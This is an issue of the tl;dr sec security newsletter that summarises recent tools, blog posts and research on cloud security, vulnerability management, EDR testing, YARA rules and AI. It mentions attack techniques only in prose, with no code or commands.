- tl;dr sec
- [tl;dr sec] #212 - AWS Security Services Best Practices, EDR Bypass Lab, 100+ Vulnerable Practice Apps
[tl;dr sec] #212 - AWS Security Services Best Practices, EDR Bypass Lab, 100+ Vulnerable Practice Apps
Guide by AWS on configuring AWS security services, free lab to learn to bypass common EDR detection mechanisms, massive list of vulnerable apps to practice on
I hope you’ve been doing well!
👋 New Year, Who Dis?
I hope you had a great holiday break and New Years!
If you're new, welcome 🙌 I'm excited you're here.
Recap: tl;dr sec is weekly newsletter, sent out Thursday mornings PT, curating and distilling the best tools, blog posts, and research about AppSec, web, cloud, container, and supply chain security, red and blue team, AI, and more.
Usually the intro is a bit silly and something about my life, and the rest is technical security content.
Sponsor blurbs are in green, and checking them out is great karma, as they make it possible for me to keep this newsletter running 🙏
Over the break I visited my family in the Midwest.
One of my favorites things I did was visit my sister’s work, who recently joined a wellness clinic where employees’ family members can use the services for free.
So like an archetypical Bay Area tech person, I strolled in there wearing my Allbirds and an unjustified sense of saving the world, and embraced All The Longevity things™️.
I did red light therapy (stand between bright red lights), sat in a 166°F infrared sauna, spent the longest 2.5 minutes of my life in a -160°F cryo chamber, and turned into a Transformer by wearing arm and leg compression boots at the same time.
I think this means I can live forever now?
📣 SEC Materiality framework
What defines a “material” cybersecurity incident?
This framework, built alongside 30+ cybersecurity executives, helps provide a baseline for determining what incidents could possibly be reported to the SEC.
*This does not constitute legal advice. Ultimately, “materiality” should be determined by your own legal counsel.
Timely and relevant for security leaders 👆️
Maturing Your Threat Modeling Skills
We Hack Purple founder and friend of the newsletter Tanya Janca will be doing a webinar with threat modeling legend Adam Shostack on January 25 at 9:00 am PT. They’ll discuss how to both structure and free flow to ensure comprehensive threat models, how to seamlessly integrate threat modeling into your SDLC, and Q&A.
Scaling vulnerability management across thousands of services and more than 150 million findings
Stephan Miehe gives a great walkthrough of how GitHub does vulnerability management at scale, including key requirements and best practices as well as their implementation. Automate all repeatable tasks, work within existing dev systems (GitHub PR workflow and Issues), have clear accountability and responsibility to help drive next steps and action, use analytics to know where you should focus to systematically drive down risk, etc.
Stephan also describes Security Findings, their internal tool that deduplicates findings from different sources (GitHub Advanced Security, bug bounty, grype), has custom views based on context (e.g. shows vulnerable images and their deployment locations for containerized apps, shows IP addresses and hostnames for a VM in a datacenter), handles exceptions, and integrates with Slack.
📣 ESET Threat Report H2 2023
A view of the H2 2023 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts.
The Cl0p cybercriminal group gained attention with the "MOVEit hack," diverting from their usual tactics by leaking information if the ransom wasn't paid. The Mozi IoT botnet faced disruption through a discovered kill switch, prompting speculation on its origin. AI-enabled attacks targeted users of tools like ChatGPT, while Android spyware cases surged with SpinOk.
These trends underscore the dynamic and diverse nature of contemporary cybersecurity challenges.
We wish you an insightful read.
A nice round-up of recent campaigns ☝️ I’m especially curious about the AI-enabled attacks targeting users of tools like ChatGPT.
AWS Security Services Best Practices
A guide by AWS on best practices for configuring AWS security services. The initial release covers Amazon Detective, GuardDuty, Inspector, Macie, and AWS Security Hub.
Cloud services as exfiltration mechanisms
Airwalk Reply’s Costas Kourmpoglou outlines a clever way an attacker can exfiltrate sensitive info from a victim network with no permissions, bypassing data perimeter IAM conditions on the victim’s identity. How? The attacker makes a request to an attacker-controlled S3 bucket, including the info to exfiltrate in the request, and then even if that request is denied, the leaked info is logged and delivered to the attacker's logging bucket because of S3 server access logging.
This technique has also been added to the excellent Hacking The Cloud wiki.
A tool that helps Kubernetes admins remove a list of non-running images from all Kubernetes nodes in a cluster.
New year, new image: Introducing the Chainguard Images Directory
Chainguard’s Adam Dawson announces:
A new Images Directory, providing a searchable inventory of ~500 minimal, hardened images with low-to-zero known CVEs
A self-service Security Advisories page to help you find the latest information on CVEs in packages you’re using
Digestabot, a GitHub Action to automatically initiate pull requests for image updates, ensuring you’re using the most secure, up-to-date versions.
By Trail of Bits: Finds unmaintained packages in Rust projects automatically using heuristics, rather than relying on users to manually submit them to the RustSec Advisory Database.
A Comparative Study of Vulnerability Reporting by Software Composition Analysis Tools
Enforcing Device Trust on Code Changes
Griffin Choe describes some 👌 security engineering that Figma built to ensure that code changes merged into GitHub release branches come from trusted, company-managed devices.
How: X.509 Okta Device Trust Certificates issued to company MacBooks are used to sign commits via a modified version of GitHub's smimesign utility. On git pushes, a custom GitHub App triggers a Lambda function that verifies the commit signature, then posts a commit status (“commit-integrity-verification”) back to GitHub. Figma also has an allowlist of GitHub bot authors they trust.
Introducing YARA-Forge. Streamlined Public YARA Rule Collection
Nextron Systems' Florian Roth introduces YARA Forge, a tool designed to streamline the collection and organization of YARA rules, analyzing rules for inconsistent metadata, quality (FP rates), and performance. It outputs core, extended, and full rulesets based on the coverage vs performance trade-offs you want to make, and currently includes rules from 20 public YARA repos.
Unveiling VISS: a revolutionary approach to vulnerability impact scoring
Zoom’s Roy Davis announces the Vulnerability Impact Scoring System (VISS), which aims to prioritize actual demonstrated impact over theoretical security impact. CVSS focuses on the attacker's viewpoint and worst-case scenarios, while VISS takes the defender’s perspective, basing its evaluations on responsibly demonstrated exploitation. VISS calculator and spec here.
Ghidriff: Ghidra Binary Diffing Engine
@clearbluejar presents ghidriff, a new open-source Python package that supports command-line binary diffing by leveraging Ghidra, and can output the result to Markdown. The post gives a great overview of the history of binary diffing, what makes it hard, and ghidriff features.
Introducing the Best EDR Of The Market Project
Yazid Benjamaa shares Best EDR of the Market, an open source EDR designed to serve as a testing ground for understanding and bypassing some of the detection mechanisms employed by many well-known EDRs, such as import address table (IAT) hooking, call stack monitoring, and DLL hooking.
Machine Learning + Security
Introducing CloudSecGPT: Your Go-To AI for Cloud Security Insights
Marco Lancini has created a cloud security-focused GPT by uploading all of the content of his excellent CloudSecDocs.com.
Dark Visitors: A list of known AI agents on the internet
Insight into the hidden ecosystem of autonomous chatbots and data scrapers crawling across the web. Lists the UserAgents of a number of AI agents (ChatGPT, Anthropic, Cohere, etc.) and how to block them with your robots.txt.
Gen AI can supercharge your AppSec program
Sandesh Anand gives a nice overview of some AppSec Gen AI applications: threat modeling (LLMs can parse and extract relevant info from design docs, architecture diagrams, etc.), delivering security standards better (only show devs the coding guidelines they need to know right now), vendor risk management (automate painful security questionnaire), and more. Also, congrats Sandesh for founding Seezo! 🙌
I covered a number of these and other Gen AI applications in this talk (slides), including pen testing, web security, malicious dependencies, and more.
Artificial intelligence can find your location, alarming privacy experts
Three Stanford graduate students built a tool, building on OpenAI’s CLIP and their own dataset of around 500,000 street view images, that given an image, can guess the correct country 95% of the time and can usually pick a location within about 25 miles of the actual site. (paper)
“Where was this photo taken” is not a new problem, Google and others have built similar things, the point here is that three grad students, with limited time and computational resources, could build something quite effective.
For non-security related AI resources, including OpenAI’s official prompting guide, a video summary of 4 NeurIPS 2023 best paper award papers, and a ton of resources on running agent workflows in the cloud, see my AI Resources page.
Apple is almost as big as France - Apple’s market value is $3.1T, the combined market value of the companies on France’s exchange is $3.1T
uBlock Origin supports procedural filters, which let you hide DOM elements based on their properties. Here's a rule Hillel Wayne uses to hide all "suggested" posts from LinkedIn, which finds sponsored posts and then walks upward a few DOM elements to filter out the entire card
4-year campaign backdoored iPhones using possibly the most advanced exploit ever
Over four years, the campaign backdoored dozens if not thousands of iPhones, many of which belonged to employees of Moscow-based security firm Kaspersky. The attack chain leverages four 0-days, and exploits a vulnerability in an undocumented hardware feature that few if anyone outside of Apple and chip suppliers such as ARM knew of. This is Olympic-level hacking, very impressive.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!